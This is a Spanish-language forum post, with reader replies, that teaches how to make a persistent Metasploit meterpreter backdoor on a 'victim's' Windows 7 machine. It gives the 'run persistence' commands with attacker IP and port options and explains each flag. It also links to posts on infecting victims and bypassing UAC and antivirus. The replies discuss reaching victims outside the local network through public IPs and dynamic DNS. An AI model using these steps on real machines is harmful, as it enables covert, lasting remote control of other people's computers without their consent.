Underc0de

(https://2.bp.blogspot.com/-nQ-i8hcgP4o/WCasdOJWCMI/AAAAAAAAD4I/1dlTj6R5ugsMC1EUYLZaSQc_XGafcvWdACLcB/s640/initial-attack3.jpg)

Saludos fieles lectores en esta oportunidad les traigo un POST sobre como crear tu Backdoor persistente en msfconsole, ha pedido de un seguidor del blog que me dejo un mensaje en privado.

¿Que es Backdoor?

se le domina como puerta trasera, cabe decir que se ejecuta un "Script" remoto a la maquina de la victima con conexion puente al ordenador del atacante, para dejar al sistema vulnerado en escucha siempre.

El Backdoor persistente es compatible con todas las versiones de Windows.

Lo primero que deben tener en cuenta es lo siguiente, penetrar el sistema de tu victima, dejo los siguientes posts donde enseño como hacerlo por diferentes métodos, de igual manera burlar los "AV":

• Dump skype account our victim for Metasploit (https://underc0de.org/foro/bugs-y-exploits/dump-skype-account-our-victim-for-metasploit/)
• Bypassear privilegios UAC en Windows 10 - 8 - 8.1 (https://underc0de.org/foro/bugs-y-exploits/bypassear-privilegios-uac-en-windows-10-8-8-1/)
• Send vídeo Youtube the victim with Metasploit (https://underc0de.org/foro/bugs-y-exploits/send-video-youtube-the-victim-with-metasploit/)

Luego de crear tu "Payload", posteriormente enviar el archivo infectado a tu victima tendremos su session meterpreter, en este caso haré la prueba de concepto en un Windows 7 service pack 1

(https://3.bp.blogspot.com/-uSY9XQlq-ms/WCat0qY2g7I/AAAAAAAAD4U/TZMRXwnA3_cg8KcQdQ5w6aZLok6vM1EfQCLcB/s640/Captura%2Bde%2Bpantalla%2Bde%2B2016-11-11%2B23-48-17.png)

Entonces lo que haremos sera ejecutar el comando persistente por default.

meterpreter > run persistence

voy a dejar bien claro lo siguiente, al ejecutar el comando run persistente estas dejando todo por Default, por ejemplo:

El puerto: 4444
IP: 192.168.1.35 (tu IP se adjuntara automáticamente)
Script Upload - directorio donde se alojara el Script vbs, que se ejecutara al momento que inicie el sistema de la victima.

(https://4.bp.blogspot.com/-1GIGIZ7wh8M/WCatzWktlWI/AAAAAAAAD4Q/gPAzvjAoaps-nB2c5ACteaz20Dw7y1zWwCEw/s640/Captura%2Bde%2Bpantalla%2Bde%2B2016-11-11%2B23-48-32.png)

Como vemos el archivo se subió correctamente en la carpeta por default.

(https://1.bp.blogspot.com/-FDSv-ZpO50E/WCat00__K5I/AAAAAAAAD4Y/EmqZ1hUvXZM6cCBZbf8Utast_Dk3k7kjwCEw/s640/Captura%2Bde%2Bpantalla%2Bde%2B2016-11-11%2B23-49-51.png)

Entonces reiniciaremos el equipo de la victima para ver si realmente nos carga  su sesión meterpreter, pero antes configuraremos el puerto de escucha, ya que en la infección se utilizo el puerto 5555.

(https://2.bp.blogspot.com/-tFq0lL-zZWI/WCavihDl1wI/AAAAAAAAD4k/cM5uj3sVabQe5o9rAySE5cRmJZZWcha5wCEw/s640/Captura%2Bde%2Bpantalla%2Bde%2B2016-11-11%2B23-52-25.png)

Esperemos que cargue nuevamente el sistema windows, pero vemos en la siguiente imagen que hemos cambiado el puerto de escucha reemplazando el 5555 a 4444 que fue generado al momento de ejecutar persistence.

(https://2.bp.blogspot.com/-q_S_334pShY/WCaxpkrYSpI/AAAAAAAAD4w/XN-6S66t6Pc3WqJWta3P54c9moYGpLF4QCLcB/s640/Captura%2Bde%2Bpantalla%2Bde%2B2016-11-12%2B00-18-54.png)

Como podemos observar automáticamente hemos tenido la conexión meterpreter.

ahora viene la pregunta de muchos:

¿si yo deseo establecer una IP y puerto diferente?

Pues sencillo vamos a utilizar algunos argumentos de persitence, un ejemplo es el siguiente:

run persistence -U -i 5 -p 4444 -r 192.168.1.35

-U >> ejecuta automáticamente el usuario comprometido y establece logs.
-i  >> segundos de conexión para establecer. 
-p >> puerto de escucha.
-r >> IP de la maquina del atacante a añadir.

(https://3.bp.blogspot.com/-1zCV2urK8tY/WCaz8Hj-SyI/AAAAAAAAD48/m1Jddd1Pl-0DpazlkEQrbOefIDacAtITQCLcB/s640/Captura%2Bde%2Bpantalla%2Bde%2B2016-11-12%2B00-25-45.png)

Entonces le añadí de igual manera el puerto 4444, y deje mi IP estatica por default, ya que es mi maquina de ataque:

Reinicie bruscamente el windows 7, entonces esperaremos a que cargue nuevamente.   

(https://1.bp.blogspot.com/-ASN2bkZVf9Q/WCaz-xwLRvI/AAAAAAAAD5A/Vj4vnmDqaPgYWPs-h50BO_sP6S4xUDY3QCLcB/s640/Captura%2Bde%2Bpantalla%2Bde%2B2016-11-12%2B00-43-10.png)

de igual manera hemos tenido su sesión meterpreter automáticamente, configurando nuestro propio script persistente.

Vaya,soy nuevo en esto y nunca me imagine que fuera tan rápido y fácil  :D.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Vaya,soy nuevo en esto y nunca me imagine que fuera tan rápido y fácil  :D.

Agradecería mi vista otro color de fuente, si es facil pero lamentablemente hasta el Avast Free te detectaría este Backdoor  :P

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
amigo disculpe tambien estoy interesado en el  curso. la pregunta es ,si conseguiste los links ,por que a my tampoco me funcionan

yo te recomiendo esto https://backtrackacademy.com/

como configurarlo si es para fuera de lan? porque eso en la misma red

Colocas tu ip publica y abris los puertos. O usas no-ip y vinculas a esa direccion.

PikachuDorado puedes explicarme como crear una ip estatica para poder conectarme con la maquina remota y no se pierda la comunicación cuando se reinicie mi computadora?

crear ip estatica no podes, eso te lo da el proveedor de internet lo que podes hacer es usar un dynamic dns como no-ip, dtdns o el que quieras

mi pregunta es como puedo conseguir la ip de una computadora si esa pc esta muy lejos o esta en otro pais

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
crear ip estatica no podes, eso te lo da el proveedor de internet lo que podes hacer es usar un dynamic dns como no-ip, dtdns o el que quieras

no-ip  ya no se usa para esos fines , si no quieres el fbi en tu puerta :v